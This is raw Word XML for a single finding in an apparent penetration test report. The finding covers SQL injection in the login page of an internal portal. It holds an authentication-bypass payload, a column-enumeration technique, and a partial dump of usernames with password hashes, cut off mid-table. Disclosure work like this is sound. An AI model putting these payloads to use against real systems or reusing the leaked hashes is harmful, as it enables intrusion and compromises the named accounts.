    <w:p w14:paraId="3DD0C82F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9C7F5B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE7616" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_heading=h.e63107btm2cf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection (SQLi) – Internal portal internal.vese.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Critical Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56951464" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6F84F392" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="303C1779" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C5D39F4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The login panel for the internal portal at </w:t>
            </w:r>
            <w:hyperlink r:id="rId12">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://internal.vese.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> (and the related PHP file </w:t>
            </w:r>
            <w:hyperlink r:id="rId13">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://internal.vese.com/login.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>) is vulnerable to SQL injection on the HTTP POST “username” parameter. By leveraging this vulnerability an attacker can obtain sensitive data contained in the database, and further compromise the underlying systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="2E105A2F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="5A810F24" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
          </w:tcPr>
          <w:p w14:paraId="242EAF85" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5ACE30BE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="446080E2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453D46B4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: internal.vese.com Port: TCP 80 (Internal portal login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="599D37AF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="3330E28F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75705340" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId14">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://owasp.org/www-community/attacks/SQL_Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7136AD24" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId15">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/89.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F6E2D48" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CC14E6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A8B33" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The file responsible for this vulnerability is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, found inside the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory of the websites’ source files. At lines 28, 29 and 31 an SQL query is defined through string concatenation, by leveraging the unsafe function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>vsprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to insert query arguments in the provided query template (variable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). This allows an attacker to escape from the provided query by prepending the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘)</w:t>
      </w:r>
      <w:r>
        <w:t>” (apostrophe and closed parenthesis) characters to an SQL statement and by appending the “--” (dash dash) characters, which will make the DBMS ignore the original query content following the injection point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB26F3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA22931" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7526E9E7" wp14:editId="70E8369B">
            <wp:extent cx="2867978" cy="520137"/>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867978" cy="520137"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1332D0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usage of the unsafe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>vsprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function to replace template markers in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sql_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91329F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1783C389" wp14:editId="34F10F8D">
            <wp:extent cx="5125403" cy="76066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125403" cy="760660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FEE87" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Call to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>create_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function to construct the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>$query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E991F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC4F934" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Since the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> does no validation or sanitization of the provided string, the query is executed as-is, allowing arbitrary SQL statements to be run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6199098B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">One straightforward exploitation of the vulnerability consists in bypassing the credentials verification by submitting the username “‘) or 1=1 – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“ with</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a random password, reaching the authenticated section of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4710088A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D247750" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B022875" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1EEE5137" wp14:editId="37AE7F47">
            <wp:extent cx="5393340" cy="18796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393340" cy="1879600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD6D5A9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP request sent to the login form to bypass the authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFA757" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3C558788" wp14:editId="383D43D9">
            <wp:extent cx="5393340" cy="32512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393340" cy="3251200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21535A4C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Authenticated section of the web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBD71A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Additionally, by leveraging the verbose error messages shown by the web application an attacker could obtain sensitive information contained in the database, by submitting SQL queries </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the one shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6237AA7A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2160B4B3" wp14:editId="1600FAD7">
            <wp:extent cx="5393340" cy="18034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393340" cy="1803400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9406B4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP request injecting the “order by 8” statement at the end of the original SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1EEF3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3EA3CC58" wp14:editId="2CE31553">
            <wp:extent cx="5393340" cy="13335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393340" cy="1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C8A5AA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP response containing an error message for the previous request, allowing an attacker to determine the number of columns in the SQL table being queried by decreasing the previously sent number (eight)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098825E1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="4721E848" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">By sending additional queries which trigger SQL error messages, it was possible to obtain the full contents of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>users.users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table, as reported below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8DDD2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-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5"/>
        <w:gridCol w:w="7575"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="42DDC778" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6CC2C3BD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7575" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06DC0CA5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="1B4E9D6C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="513A22E8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nsanders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7575" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E59EFBB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>ef91307aae4da64fa55b90ae1fc1f3c5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="4F9E1FAE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31F9EC76" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstewart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7575" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
